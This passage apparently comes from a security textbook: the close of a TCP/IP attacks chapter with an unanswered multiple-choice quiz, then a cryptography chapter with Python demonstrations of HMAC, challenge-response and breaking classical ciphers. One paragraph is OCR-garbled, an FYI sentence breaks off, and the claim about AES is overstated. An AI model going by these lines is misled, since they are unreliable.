  • DDoS attack — Similar to DoS, except the attack is launched from multiple distributed agent IP devices. Examples of DDoS programs include Tribal Flood Network (TFN), TFN2K, Shaft, and Trinoo.
  • Botnets — A term used to describe robot-controlled workstations that are part of a collection of other robot-controlled workstations.
These devices can be used for DoS or to flood systems with spam.

FIGURE 2-10 TCP/IP model and each layer's controls. (Controls shown: application layer, virus scanners, SSH, SET, PGP, S/MIME, Kerberos, secure coding, TACACS; host-to-host layer, SSL, TLS, SOCKS, S/RPC; Internet layer, IPSec, packet filters, PPTP, L2TP; network access/physical layer, CHAP, WEP, NAT, fiber.)

Controls and Countermeasures

Application Layer Controls

Following are some examples of application layer controls. An overview of the controls discussed for each layer of the TCP/IP model can be seen in Figure 2-10. Some application layer software controls include the following:

• Malware scanners — Anti-malware programs can use one or more techniques to check files and applications for viruses. Malware detection software has changed from an add-on tool to a must-have system requirement.
• SSH — A secure application layer program that has security features built in. SSH sends no data in cleartext; usernames and passwords are encrypted. SSHv2 offers even greater protection.
• Pretty Good Privacy (PGP) — PGP uses a public-private key system and offers strong protection for e-mail.
• Secure/Multipurpose Internet Mail Extension (S/MIME) — Secures e-mail by using X.509 certificates for authentication. S/MIME works in one of two modes: signed and enveloped.

CHAPTER SUMMARY

This chapter examined some of the more commonly used applications and protocols used by TCP/IP. The purpose of this review was to better understand how the protocols work. Understanding the underlying mechanics and functioning of a protocol allows the security professional to better defend against attacks. Knowing the mechanics of a protocol also assists in the understanding of the attacks themselves. As a security professional, it is of vital importance to be not just reactive, but proactive.
Thinking about how an attacker could leverage or exploit holes present in systems is an invaluable tool in your toolbox. The knowledge presented in this chapter will emerge in different forms and in different places throughout the rest of this text.

KEY CONCEPTS AND TERMS

Address Resolution Protocol (ARP), Deny-all principle, Domain Name Service (DNS), Encapsulation, Firewall, Flow control, Frame, Institute of Electrical and Electronics Engineers (IEEE), Layer 2 Tunneling Protocol (L2TP), Media access control (MAC) address, Physical/network equipment, Reverse Address Resolution Protocol (RARP), Router, Serial Line Interface Protocol (SLIP), Sniffer, Subnet mask, SYN attack, Transport Layer Security (TLS), User Datagram Protocol (UDP)

CHAPTER 2 ASSESSMENT

1. What is the network layer of the OSI reference model responsible for?
   A. Physical layer connectivity
   B. Routing and delivery of IP packets
   C. Formatting the data
   D. Physical framing
   E. None of the above

2. Which of the following is not an attribute of OSPF?
   A. Security
   B. The use of IP multicasts to send out router updates
   C. No limitation for hop count
   D. Subject to route poisoning

3. Which of the following makes UDP harder to scan for?
   A. Low overhead
   B. Lack of startup and shutdown
   C. Speed
   D. Versatility

4. Which of the following best describes how ICMP is used?
   A. Packet delivery
   B. Error detection and correction
   C. Logical errors and diagnostics
   D. IP packet delivery

5. The most common type of ICMP message is ________.

6. Which of the following statements most closely describes the difference between routing and routable protocols?
   A. IP is a routing protocol, whereas RIP is a routable protocol.
   B. OSPF is a routing protocol, whereas IP is a routable protocol.
   C. BGP is used as a routable protocol, whereas RIP is a routing protocol.
   D. Routable protocols are used to define the best path from point A to point B, while routing protocols are used to transport the data.
7. What is another way used to describe Ethernet?
   A. Collision detection
   B. Sends traffic to all nodes on a hub
   C. CSMA/CD
   D. All of the above

8. Botnets are used to bypass the functionality of a switch.
   A. True
   B. False

9. What is a security vulnerability found in RIP?
   A. Slow convergence
   B. Travels only 15 hops
   C. No authentication
   D. Distance vector

10. Which of the following best describes the role of IP?
   A. Guaranteed delivery
   B. Best effort at delivery
   C. Establishes sessions by means of a handshake process
   D. It is considered an OSI Layer 2 protocol

Cryptographic Concepts

IN THE FIELD OF INFORMATION SECURITY, there are a handful of topics that serve as the foundation for understanding other technologies. One of these foundations is cryptography, which is a body of knowledge that deals with the protection and preservation of information. Cryptography is one of the techniques woven into the very fabric of other technologies, including IP Security (IPSec), certificates, digital signatures, and many others. Common examples of cryptography in use include Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), and 802.11i (WPA2), not to mention Secure Sockets Layer (SSL), just to name a few. (WEP is also the standard example of cryptography applied badly: its keystream reuse and weak integrity check let an attacker recover the key from captured traffic in minutes.) With a firm grasp of cryptography in hand, you can fully understand other technologies and techniques, and their proper applications.

Cryptography provides information protection in the areas of confidentiality and integrity as well as providing the additional advantage of nonrepudiation. If applied properly, cryptography can provide robust protection that would not otherwise be possible. Confidentiality is the ability to protect information from unauthorized disclosure; information cannot be viewed by those not authorized access. Integrity is provided through the cryptographic mechanism known as hashing. Nonrepudiation provides the ability to prevent a party from denying the origin of the information in question.
You can use cryptographic techniques to provide these same solutions to information both in transit and in storage. From another perspective, it is important to understand cryptography in order to properly evaluate systems. Understanding the different types of cryptographic algorithms can make evaluating software and services easier by providing insight into how something is supposed to work. Furthermore, understanding cryptography allows the ethical hacker to properly evaluate systems to look for weaknesses and to better understand threats. Password cracking, authentication systems testing, traffic sniffing, and secure wireless networks are all areas that involve encryption and are commonly tested by ethical hackers on behalf of clients.

This chapter covers the following topics and concepts:

• What the basics of cryptography are
• What symmetric encryption is
• What asymmetric encryption is
• What the purpose of public key infrastructure (PKI) is
• What hashing is
• What common cryptographic systems are
• What cryptanalysis is

Chapter 3 Goals

When you complete this chapter, you will be able to:

• Describe the purpose of cryptography
• Describe the usage of symmetric encryption
• List the advantages and disadvantages of symmetric encryption
• Detail components of symmetric algorithms such as key size, block size, and usage
• Show the importance of asymmetric encryption and how it provides integrity and nonrepudiation
• Describe common asymmetric algorithms
• Identify the purpose and usage of hashing algorithms
• Explain the concept of collisions
• State the purpose of digital signatures
• Explain the usage of PKI
• Identify common cryptographic systems
• Describe basic password attack methods

NOTE: Many forms of encryption have been used throughout history. In World War II, the German Enigma and Japanese JN-25 systems were used widely (and broken by Allied cryptographers).
Cryptographic Basics

Cryptography provides an invaluable service to security by providing a means to safeguard information against unauthorized disclosure, and also provides a means to detect modification of information. Cryptography additionally provides the ability to have confidence as to the true origin of information through what is known as nonrepudiation.

Cryptography is not a new technique, and understanding some of the older techniques may assist in understanding the process. Several forms of cryptography appear throughout history; for example, Julius Caesar used a cipher to communicate sensitive information with his generals. The cipher works by means of what is known as a key shift, in which each character in a message is moved the same number of positions to the left or right. (Caesar used a key of 3, meaning A encrypted to D, B encrypted to E, and so on.) We call ciphers similar to the one he used "Caesar ciphers." While simple in practice and easily broken today, the cipher preserved confidentiality for two reasons: illiteracy was high outside the Roman Empire, and anyone who was literate might assume that the message was in another language. Indeed, only those who knew what they were looking at could reverse the process and, presumably, these people were limited to Caesar and his generals. As one can see, encryption, while not a new technique, still has the same function: to protect information from all but the authorized parties.

Understanding the information-hiding or confidentiality aspect of encryption requires that one understand several terms and concepts, starting with codes and ciphers. Codes and ciphers have a history of being used interchangeably, but this is not correct. Specifically, codes are a mechanism that relies on the usage of complete words or phrases, whereas ciphers operate on single letters (or, in modern ciphers, bits) to perform encryption.
Some common forms of ciphers include substitution (the Caesar cipher is a type of substitution), stream, and block. Many forms and types of ciphers and codes exist, but each one tends to share the goal of confidentiality of information. In today's world, ciphers and codes are used in cryptographic systems to protect e-mail, transmitted data, stored information, personal information, and e-commerce transactions.

The next area that is commonly associated with and involves encryption is authentication. Authentication is the process of positively identifying a party as a user, computer, or service. Authentication is being used more often in the software industry to ensure that application software and items such as software drivers are actually genuine. In the case of software-based items, authentication takes the form of a digital signature to show that a piece of software is genuine. Authentication of drivers plays a vital role in system stability because having a driver signed and verified as coming from the actual vendor, and not from some other unknown (and untrusted) source, assures that the code in question has met certain standards. Authentication in the context of electronic messaging provides the ability to validate that a message has come from a source that is known and can be trusted. With messaging authentication in place, you can have a system where messages that cannot be authenticated are not accepted as being genuine. Finally, encryption plays a prominent role in the actual authentication process. Consider that the information used to authenticate an identity, such as a PIN or password, needs to be kept secret to prevent disclosure to unauthorized parties. For example, through the use of hashing, passwords don't need to be transmitted over a network (the hashes are sent instead), and they can be compared with what is previously known without sending the password.
Because the hashes would already be associated with a known user, if the two hashes match (the one transmitted and the one stored and associated with the user), then the user can be said to be validated. Note that a bare hash sent over the wire is itself a reusable credential: anyone who captures it can replay it, which is why practical protocols instead hash or MAC a fresh, server-supplied challenge.

Two well-known examples of protocols in which encryption can play an important role are File Transfer Protocol (FTP) and Telnet. Both were designed at a time when security threats weren't considered as they are today. In practice FTP and Telnet do not include any form of encryption or protection, which means that the authentication and data transmission processes are all easily viewable by software such as packet sniffers. Through the introduction of additional mechanisms that can provide encryption where these protocols cannot, it is possible to overcome the limitations of the protocol by encrypting or hashing the password prior to transmission, thereby keeping the password secret during transmission. An even better solution to the challenges posed by FTP and Telnet is to use Secure Shell (SSH) instead, which encrypts the logon and the transmission of information.

Virtual private networks (VPNs) also use authentication, but instead of a cleartext username and password, they use special tunneling protocols that leverage the power of encryption to provide security for data. VPNs can also leverage other techniques that rely on cryptographic techniques, such as digital certificates and digital signatures, to more accurately identify the user and protect the authentication process from spoofing.

Integrity is another widely used and important role of cryptography. Integrity is the ability to verify that information has not been altered and has remained in the form originally intended by the creator.
Consider the potential impact of receiving a piece of information that has been altered at some point between the sender and receiver; if such information were altered to say yes instead of no or up instead of down, the results could be catastrophic. Envision a scenario in which you receive an official but nonconfidential message from a business partner, stating that a customer wants to purchase a product for $50,000. Consider what would happen in this scenario if an unethical customer intercepted and altered the message to say $5.00 instead of $50,000. Obviously, if this happens often, it could cause a company enough losses that it would be out of business or suffer significant financial loss. You can see that integrity is very important to detecting alterations to data, but it cannot preserve confidentiality on its own.
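The hash-based login described earlier and the altered purchase order above, worked in code. This is an added example, not code from the original text: it assumes a server that stores a random salt and a PBKDF2-derived verifier per user (the `enroll`, `issue_challenge`, `client_response` and `server_check` names are mine) and, for the integrity half, a key already shared between the two business partners. The messages are constructed for the demonstration.

```python
"""Integrity with a MAC, and a challenge-response login that never sends the
password, as added examples (not from the original text).

Assumed setup: the server keeps, per user, a random salt and a verifier
derived from the password with PBKDF2; the client has the password; both
business partners share 'shared_key' for the message-tag part.
"""
import hashlib
import hmac
import secrets

# ---- Integrity: the $50,000 -> $5.00 alteration from the text ----


def tag_message(shared_key: bytes, message: bytes) -> bytes:
    """Message authentication code: HMAC-SHA256 over the message under a shared key."""
    return hmac.new(shared_key, message, hashlib.sha256).digest()


def verify_message(shared_key: bytes, message: bytes, tag: bytes) -> bool:
    """Constant-time comparison so a forger learns nothing from timing."""
    return hmac.compare_digest(tag_message(shared_key, message), tag)


def forge_with_bare_hash(message: bytes) -> bytes:
    """A bare hash is NOT integrity against an active attacker: whoever alters
    the message can recompute the hash, so the receiver cannot tell."""
    return hashlib.sha256(message).digest()


# ---- Authentication: hashed secret, fresh challenge, no password on the wire ----

PBKDF2_ITERATIONS = 100_000


def derive_key(password: str, salt: bytes) -> bytes:
    """Slow, salted derivation so a stolen verifier is expensive to brute-force."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def enroll(password: str, salt: bytes = b""):
    """Server side at enrollment: store (salt, verifier), never the password."""
    salt = salt or secrets.token_bytes(16)
    return salt, derive_key(password, salt)


def issue_challenge() -> bytes:
    """Server side at login: a fresh random nonce, so a captured answer cannot be replayed."""
    return secrets.token_bytes(16)


def client_response(password: str, salt: bytes, nonce: bytes) -> bytes:
    """Client side: prove knowledge of the password by MACing the nonce with the derived key."""
    return hmac.new(derive_key(password, salt), nonce, hashlib.sha256).digest()


def server_check(verifier: bytes, nonce: bytes, response: bytes) -> bool:
    """Server side: recompute with the stored verifier and compare in constant time."""
    expected = hmac.new(verifier, nonce, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    key = b"shared-secret-between-partners"
    order = b"customer wants to purchase a product for $50,000"
    tag = tag_message(key, order)
    print("genuine order verifies:", verify_message(key, order, tag))
    print("altered order verifies:", verify_message(key, order.replace(b"50,000", b"5.00"), tag))

    salt, verifier = enroll("correct horse battery")
    nonce = issue_challenge()
    print("login ok:", server_check(verifier, nonce, client_response("correct horse battery", salt, nonce)))
```

Two caveats a tester should keep in mind: the replayed response fails only because the nonce changes each time, so a server that reuses nonces is back to pass-the-hash; and the stored verifier is password-equivalent for this protocol (whoever steals the database can answer challenges), which is the problem that password-authenticated key exchanges such as SRP were designed to remove.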

Following confidentiality and integrity of information is nonrepudiation, or the ability
to have definite proof that a message originated from a specific party. The usual
nonrepudiation measure is the digital signature, supported by digital certificates that bind
the signing key to an identity. (Message authentication codes (MACs) are sometimes listed
here too, but because a MAC is computed with a key that both parties hold, either of them
could have produced it; a MAC proves integrity and origin to the peer, not nonrepudiation
to a third party.) One of the more common uses of nonrepudiation is in messaging or e-mail
systems. In an e-mail system, if nonrepudiation mechanisms are deployed, usually through
digital signatures, it is possible to achieve a state where every official message can be
confirmed as coming from a specific party or sender. In such systems, it would be nearly


FYI

Over the last few years, technologies such as BitLocker by Microsoft and TrueCrypt have
emerged as solutions to the encryption of data on hard drives. (TrueCrypt development ended
in 2014; the VeraCrypt fork continues it.) With the introduction and increased accessibility
of volume encryption solutions, more organizations are practicing information safety by
encrypting the drives of portable devices as well as removable devices such as USB flash
drives and hard drives.

impossible for an individual to deny sending a message because the digital signature can
be applied only by the person who has exclusive access to the private key. In enterprise or
high-security environments, a state in which it is impossible for a party to deny sending
a message or initiating an action is desirable. Also consider another fact of today's world:
with the Internet allowing communication between parties who may never meet, having
nonrepudiation to track an action back to a specific party is a benefit. A common example
of a nonrepudiation measure is the digital signature; additional measures include digital
certificates. This is only as strong as the protection of the private key: a key that has been
copied, shared, or stored on an unlocked machine no longer identifies exactly one party.

Up to this point, a lot of attention has been given to the value of encryption for
transmission and for verification of data in storage. In today's work environment, increasing
numbers of workers are being provided laptops or other similar mobile devices to work
on the road. These mobile devices are misplaced now and then, and whether the device
is stolen or left behind at an airport security checkpoint, the problem is the same: the
data on the system is lost. For example, the U.S. Department of Veterans Affairs (VA) and
the Transportation Security Administration (TSA) have lost laptops containing highly sensitive
information that included personal information of patients, in the former example, and
personal data on registered travelers, in the latter. In both cases and in numerous others,
the impact could have been lessened if encryption had been used to protect the hard drives
of the laptops. Of course, encryption cannot prevent the loss or theft of a device, but it
can serve as a formidable obstacle for whoever finds it, preventing them from obtaining
sensitive information. Full-disk encryption protects data at rest; it does little for a device
that is lost while powered on and unlocked, so it should be paired with a screen lock and a
short sleep-to-lock timeout. Many state, local, and federal agencies have made it mandatory
to encrypt the hard drives of laptops in order to lessen the potential impact of a lost device.
For example, in the state of California, Senate Bill 1386 provides legal protection for
entities that accidentally disclose information if the hard drives on those systems can
be shown to have been encrypted.

Within encryption, there are two types of cryptographic mechanisms: symmetric and
asymmetric. The differences between the two mechanisms are significant. Symmetric
cryptography is a mechanism that uses a single shared key for encrypting and decrypting.
The alternative method is asymmetric cryptography, which utilizes two keys, one public
and one private; what is performed with one key can only be reversed with the other.
At this point, it is important to understand that for both symmetric and asymmetric
cryptography, data is encrypted by applying the key to an encryption algorithm.
The algorithm uses the key to perform mathematical substitutions, transpositions,
permutations, or other binary math on plaintext to create ciphertext.


Substitution ciphers replace each letter or group of letters with another letter or
group of letters. Probable words or phrases can be guessed by knowing the language in
which the original unencrypted message was written. Substitution ciphers preserve the
order of the plaintext symbols but disguise them. An example of a simple substitution
cipher can be found in many daily newspapers in the puzzle section. Although there
are 15,511,210,043,330,985,984,000,000 (about 15 septillion) possible keys, because the
substitution cipher preserves so much of the original information (letter frequencies,
word lengths, and repeated patterns), the correct key can often be discovered by an
average person over a cup of coffee. This demonstrates that just because an encryption
scheme has a large number of possible keys, it isn't necessarily secure. Key length only
matters once the algorithm itself leaks nothing; it is the algorithm, together with the
key, that creates security. Don't be confused by vendors who claim their solutions are
better because they support longer keys. Size isn't everything in cryptography.

Transposition ciphers are different from substitution ciphers in that they reorder
the letters but do not replace them. The cipher is keyed by use of a word or phrase.

Cryptographic History

Humans have been using cryptographic techniques for thousands of years; the
only things that have changed are the complexity and creativity of the techniques.
Cryptography covers the confidentiality, integrity, and nonrepudiation of information,
but at one point cryptography referred solely to protecting the confidentiality of
information. A quick look back into history shows some of the ways that encryption was used:

• Egyptian hieroglyphics — In some circles, the hieroglyphics painted on the walls
of temples and tombs were a form of encryption because only specific parties
were able to understand them. This was a type of substitution cipher.

• Scytale — The Spartans used this technique to send encoded messages to the
front line. It used a rod of fixed diameter with a leather strap that was wrapped
around it. The sender wrote the message lengthwise, and when the strap was
unwound, the letters appeared to be in a meaningless order. By rewrapping on
the correct-diameter rod, the strip would line up, and the message was revealed.
This was a type of transposition cipher.

• Caesar cipher — A type of substitution cipher in which each letter in the
plaintext is replaced by a letter some fixed number of positions down the alphabet
(see Figure 3-1).

FIGURE 3-1 Caesar cipher: the plaintext alphabet (A B C D E F G H I J K L ...) written above the shifted cipher alphabet (X Y Z A B C D E F G H I ...).


• Polyalphabetic cipher (Vigenère cipher) — A substitution cipher that uses multiple
substitution alphabets, as shown in Figure 3-2. Vigenère ciphers consist of simple
polyalphabetic ciphers similar to and derived from Caesar ciphers. Instead of shifting
each character by the same number, as with a Caesar cipher, characters located at
different positions are shifted by different numbers, chosen by the letters of a
repeating keyword.

• Enigma — An electromechanical rotor machine used for the encryption and
decryption of classified messages by Germany during World War II.

• JN-25 — An encryption process used by the Japanese during World War II to encrypt
sensitive information. Allied cryptographers broke the JN-25 code, and Admiral
Nimitz knew the intended location of the Japanese fleet when it launched its attack
on the island of Midway on June 4, 1942. As a result, the American fleet located
the Japanese fleet and won a decisive victory, defeating a superior force with the
element of surprise (and some luck).

• Concealment cipher — The message is present but concealed in some way; as an
example, the hidden message may be the first letter in each sentence or every sixth
word in a sentence.

FIGURE 3-2 Polyalphabetic cipher (Vigenère tableau): a 26 x 26 table whose rows are the alphabet shifted by 0 through 25 positions; the row selected by the key letter and the column selected by the plaintext letter give the ciphertext letter.


Cryptography is also seen in places where it is not normally expected, such as games.
Cryptography has shown up in children's puzzles, on the back of cereal boxes, and in video
games. In one of the more creative uses of cryptography, Valve Software in early 2010
announced the sequel to the popular game Portal by placing a series of cryptographic puzzles
in the original game that had to be cracked in order to obtain news on the sequel. Other
examples include cryptographic puzzles and hints in TV shows such as Lost that can be solved
to get additional clues about the show. Although such examples aren't used to protect sensitive
information, they illustrate other ways the techniques are used.

• One-time pad — Uses a large nonrepeating key. Each cipher key character is used
exactly once and then destroyed. Keys must be completely random, or nearly so,
and must be as long as the message. One-time pads are used for extremely sensitive
communications (for example, diplomatic cables). Prior to use, keys must be
distributed to each party in a manner that cannot be intercepted (for example,
in the "diplomatic pouch" that cannot be opened or inspected by another nation).
Sending the key using the same mechanism as the message would compromise
the cipher, and reusing a pad for a second message compromises both messages.
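The Caesar, Vigenère and one-time pad entries above, each implemented next to the mistake that breaks it. This is an added example, not code from the original text; the sample messages are constructed for the demonstration, and the pad in the two-time-pad function is assumed to have been (wrongly) reused.

```python
"""Caesar, Vigenere and one-time pad encryption, each next to the mistake
that breaks it.

Added example, not from the original text; the sample messages are
constructed for the demonstration.
"""
import string

ALPHABET = string.ascii_uppercase


def caesar(text: str, shift: int) -> str:
    """Shift every letter `shift` places (a negative shift decrypts); other characters pass through."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_brute_force(ciphertext: str) -> dict:
    """The whole keyspace is 25 shifts, so an attacker just tries them all
    and reads off the one that looks like language."""
    return {k: caesar(ciphertext, -k) for k in range(1, 26)}


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Polyalphabetic: letter i is Caesar-shifted by key letter (i mod len(key)),
    which is exactly the row/column lookup in the Vigenere tableau."""
    out, i = [], 0
    for ch in text.upper():
        if ch in ALPHABET:
            k = ALPHABET.index(key[i % len(key)].upper())
            out.append(ALPHABET[(ALPHABET.index(ch) + (-k if decrypt else k)) % 26])
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def one_time_pad(data: bytes, pad: bytes) -> bytes:
    """XOR with a truly random pad at least as long as the data; the same call decrypts.
    Generate the pad with secrets.token_bytes(len(data)) and use it exactly once."""
    if len(pad) < len(data):
        raise ValueError("pad must be at least as long as the message")
    return bytes(d ^ p for d, p in zip(data, pad))


def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """If one pad encrypts two messages, XORing the ciphertexts cancels the pad
    and leaves plaintext1 XOR plaintext2, from which both texts are usually recovered."""
    return bytes(a ^ b for a, b in zip(c1, c2))


if __name__ == "__main__":
    print(caesar("ATTACK AT DAWN", 3))                 # DWWDFN DW GDZQ
    print(caesar_brute_force("DWWDFN DW GDZQ")[3])     # ATTACK AT DAWN
    print(vigenere("ATTACK AT DAWN", "LEMON"))         # LXFOPV EF RNHR
```

`caesar_brute_force` is the whole attack on a 25-key cipher: no cryptanalysis, just enumeration, which is the point the substitution-cipher paragraph makes about keyspace versus algorithm. `vigenere` resists that enumeration but still leaks through its repeating key (Kasiski examination finds the key length, then each position is a Caesar cipher again). `two_time_pad_leak` is why the pad may never be reused: the pad cancels and what remains depends only on the two plaintexts.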

Any organization can use cryptography to protect the confidentiality and integrity of
information. Some that have found cryptography useful include corporations, governments,
individuals, and criminals; each has used cryptography to preserve security in some way.

The capabilities of cryptography lie within four areas:

• Privacy — Deals with enforcement of one of the pillars of information security:
confidentiality.

• Authenticity — The ability to ensure that a piece of data can be verified as being
valid and can be trusted.

• Integrity — Allows for the detection of alterations in a given unit of information
through the process known as hashing. Against a deliberate attacker the hash itself
must be protected, by computing it with a keyed function (a MAC) or signing it;
otherwise whoever alters the data can simply recompute the hash.

• Nonrepudiation — The ability to have positive proof that a message or action
originated with a certain party.

It is important to separate the ability of encryption to provide confidentiality and integrity.
Confidentiality maintains the secrecy of data, but does not provide a way of detecting data
alteration. Integrity of data is provided via hashing functions that allow for the detection
of alterations of information, but does not provide confidentiality because hashing does
not encrypt data. If both integrity and confidentiality are desired, it is possible to combine
techniques to achieve both goals.


Symmetric Encryption

Symmetric encryption uses the same key to encrypt and to decrypt information. When
encrypting a given piece of in form tit ion, there arc two different mechanisms an algorithm
etui use: stream cipher or block cipher. Stream ciphers operate one hit at a time by
nppivbiLi ei pseudorandom key to the plaintext. In a block cipher, data is divided into
fixed lengths, or blocks (usually 64 bits): all the bits are then acted upon by the cipher
to produce an output, The output size of each of these ciphers is the same as the input
size, which means they can be used for real-time applications such as voice and video.
A large number of encryption algorithms are block ciphers.
Here are some basic concepts to understand:

• Unencrypted data is known as cleartext or plaintext. Don’t get confused by the four letters at the end (text); cleartext and plaintext both refer to information that is still in a format that is understandable to a person or an application (for example, it could be raw video).

• Encrypted data is known as ciphertext and cannot be understood by any party that does not have the correct encryption algorithm and the proper key.

• Keys are used to determine the specific settings to be used for encryption. The key can be thought of as a combination of bits that determines the settings to be used to encrypt or decrypt. Keys can be generated by hashing some keyboard inputs (weak, because such keys could be duplicated through guessing or brute force) or by a pseudorandom number generator (stronger, because the result is much more difficult to duplicate). There is a concept called a “weak key,” which means that it causes the algorithm to “leak” information from plaintext to ciphertext. Often these are keys such as all zeros or all ones, or some repeating pattern. Algorithms that use longer keys will have a larger “keyspace” — the universe of all possible keys. The larger the keyspace, the more computation required by an adversary to try all of them. Longer keys combined with a strong algorithm represent better security.

• The quality of the algorithm is of vital importance to the effectiveness of the encryption process. The algorithm determines how encryption will be performed and, along with the key, the effectiveness of the cryptosystem. Remember that the algorithm, the length of the key, and the quality of the algorithm together determine how secure a system is.
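The distinction drawn above between confidentiality and integrity is easiest to see in code. The following is an added example, not text or code from the original chapter: it builds a toy stream cipher of the kind described (a pseudorandom keystream XORed bit by bit onto the plaintext; the keystream here is SHA-256 in counter mode, an illustration rather than a vetted cipher), shows that a single byte damaged in transit decrypts without any error, and then adds an HMAC so the same damage is detected. The message, key sizes and byte index are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed sample message for the demonstration (not from the original text).
SAMPLE_PLAINTEXT = b"Meet in room 0100 at noon"


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy pseudorandom keystream: SHA-256 over key || nonce || counter.

    A stand-in for a real stream cipher so the example needs only the
    standard library; it illustrates the XOR construction, nothing more.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def stream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: the stream cipher XORs data with the keystream bit by bit."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def integrity_tag(mac_key: bytes, nonce: bytes, ciphertext: bytes) -> bytes:
    """HMAC-SHA256 over nonce and ciphertext: the integrity check the cipher alone lacks."""
    return hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()


def open_authenticated(enc_key: bytes, mac_key: bytes, nonce: bytes,
                       ciphertext: bytes, received_tag: bytes) -> bytes:
    """Check the tag (constant-time compare) before decrypting anything."""
    if not hmac.compare_digest(integrity_tag(mac_key, nonce, ciphertext), received_tag):
        raise ValueError("integrity check failed: ciphertext was altered")
    return stream_xor(enc_key, nonce, ciphertext)


def corrupt_byte(data: bytes, index: int, mask: int) -> bytes:
    """Simulate one byte damaged in transit by flipping the bits in `mask`."""
    out = bytearray(data)
    out[index] ^= mask
    return bytes(out)


def demo() -> dict:
    enc_key = secrets.token_bytes(32)   # keys from a CSPRNG, as the text recommends
    mac_key = secrets.token_bytes(32)   # separate key for the integrity check
    nonce = secrets.token_bytes(16)     # fresh nonce per message: never reuse a keystream

    ciphertext = stream_xor(enc_key, nonce, SAMPLE_PLAINTEXT)
    roundtrip_ok = stream_xor(enc_key, nonce, ciphertext) == SAMPLE_PLAINTEXT

    # Confidentiality only: damage to ciphertext byte 13 (the '0' of "0100")
    # flips the same bit of the plaintext, and decryption reports no error.
    damaged = corrupt_byte(ciphertext, 13, 0x01)
    silently_wrong = stream_xor(enc_key, nonce, damaged)

    # Confidentiality plus integrity: the same damage is rejected.
    tag = integrity_tag(mac_key, nonce, ciphertext)
    try:
        open_authenticated(enc_key, mac_key, nonce, damaged, tag)
        detected = False
    except ValueError:
        detected = True

    return {
        "roundtrip_ok": roundtrip_ok,
        "silently_wrong": silently_wrong,
        "detected": detected,
        "intact_ok": open_authenticated(enc_key, mac_key, nonce, ciphertext, tag) == SAMPLE_PLAINTEXT,
    }


if __name__ == "__main__":
    print(demo())
```

The decrypted text after the damage reads “Meet in room 1100 at noon”: the cipher kept the message secret, but nothing about it reveals that a bit changed. Only the separate integrity check (the HMAC) catches it, which is the point of combining the two techniques.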

Symmetric encryption is in widespread usage in various applications and services as well as techniques such as data transmission and storage. Symmetric encryption, like any other encryption technique, relies on the secrecy and strength of the key. If the key generation process is weak, the entire encryption process will be weak.

CHAPTER 3 Cryptographic Concepts

59

FYI

As technology improves, longer key lengths are generally implemented. In the 1970s and early 1980s, a 56-bit Data Encryption Standard (DES) key was considered to be adequate to resist a brute-force attack for up to 90 years. Today, specially built powerful computers can brute force

Elliptic curve cryptography, due to the nature of the computations involved, has intrinsically shorter keys (for example, a 256-bit EC key has as much cryptographic strength as a 3,072-bit RSA key, when you consider the algorithm as part of the “strength,” which you must).

In symmetric encryption, one key is used for both the encryption and decryption processes; as such, the key must be distributed to all the parties who will need to perform encryption or decryption of data in the system. Due to this arrangement, it is necessary for a process to be in place to distribute the keys to all parties involved, because keys cannot simply be transmitted in the same way as the encrypted data lest they be intercepted by unauthorized parties. In symmetric encryption, additional steps are needed to protect the key because the interception of a key will allow unrestricted access to the secured information. To prevent the unauthorized disclosure of a key to parties not authorized to possess it, you can use what is known as out-of-band communications. Using this technique it is possible to distribute a key in a manner different from the data, thereby preventing someone from intercepting the key with the data. This would be akin to sending an e-mail to someone in an encrypted format and then calling them on the phone and giving them the key. If a large key and a strong algorithm are used with symmetric encryption, the strength of the system increases dramatically, but this strength does not amount to much if the key is accessible to unauthorized parties. An example of symmetric encryption is shown in Figure 3-3.

FIGURE 3-3 Symmetric encryption. (Plaintext → Encryption → Ciphertext → Decryption → Plaintext, readable again; the same key is used for both operations.)


Another important characteristic that makes symmetric encryption preferable to asymmetric encryption is that it is inherently faster due to the nature of the computations performed. When processing a large amount of data, this performance advantage becomes significant. To get the best of both worlds, modern cryptography usually utilizes asymmetric encryption to establish the initial “handshake,” passing a symmetric encryption key from one party to another. That key is then used by both parties to encrypt and decrypt the bulk of the information.

The most widely recognized symmetric-key algorithm is DES. Other symmetric algorithms include the following:

• 3DES (or Triple DES) — An extended, more secure version of DES that performs DES three times.

• Advanced Encryption Standard (AES) — The replacement algorithm for DES that is more resistant to brute-force attack. AES is designed to make it mathematically impossible to break using current technology.

• Blowfish — A highly efficient block cipher that can have a key length up to 448 bits.

• International Data Encryption Algorithm (IDEA) — Uses 64-bit input and output data blocks and features a 128-bit key.

• RC4 — A stream cipher designed by Ron Rivest that is used by WEP.

• RC5 — A fast block cipher designed by Ron Rivest that can use a large key size.

• RC6 — A cipher derived from RC5.

• Skipjack — A symmetric algorithm with an 80-bit key length, developed by the National Security Agency (NSA).

NOTE

The security of symmetric encryption is completely dependent on how well the key is protected. Managing the cryptographic keys is of the utmost importance.

The algorithms listed here are only a small number of the symmetric algorithms available, but they represent the ones most commonly used in encryption systems. While each is a little different, they do share certain characteristics, such as the common single key to encrypt and decrypt and the performance benefits associated with symmetric systems.

FYI

Skipjack was developed by the NSA in 1993 to be adopted by telecom companies and embedded in communication devices via the Clipper Chip. With a court order (required because keys were escrowed), NSA would have had the ability to listen in on specific conversations. When the program was made public, popular resentment toward “Big Brother” created sufficient political pressure to doom the project by 1996. Oddly enough, ill-informed people seemed to prefer the arrangement where anyone could intercept their unencrypted communications rather than permit the possibility that only the federal government might be able to intercept their encrypted communications, which would have been safe from any other eavesdropper.


